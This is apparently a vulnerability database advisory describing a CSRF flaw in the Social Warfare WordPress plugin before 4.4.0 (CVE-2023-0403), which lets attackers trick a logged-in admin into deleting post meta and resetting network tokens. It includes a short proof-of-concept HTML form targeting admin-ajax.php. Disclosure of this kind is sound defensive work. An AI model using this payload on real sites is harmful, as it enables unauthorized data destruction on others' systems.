Lucene search
WpvulndbWPEX-ID:7140ABF5-5966-4361-BD51-EE29D3071A30HistoryJan 05, 2023 - 12:00 a.m.
Social Warfare < 4.4.0 - Post Meta Deletion via CSRF
2023-01-0500:00:00
wpvulndb
73
social warfare
post meta deletion
csrf
admin-ajax.php
0.001 Low
EPSS
Percentile
45.7%
The plugin does not have CSRF checks in some AJAX actions, allowing attackers, to make a logged in admin call them and delete arbitrary post meta as well as reset access tokens related to network via CSRF attacks
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="swp_delete_network_tokens">
<input type="text" name="network" value="42">
<input type="submit" name="submit" value="submit">
</form>Related
prion
prion
Cross site request forgery (csrf)
2023-01-19 15:15:00
cvelist
cvelist
CVE-2023-0403
2023-01-19 14:07:59
nvd
nvd
CVE-2023-0403
2023-01-19 15:15:14
cve
cve
CVE-2023-0403
2023-01-19 15:15:14
wpvulndb
wpvulndb
Social Warfare < 4.4.0 - Post Meta Deletion via CSRF
2023-01-05 00:00:00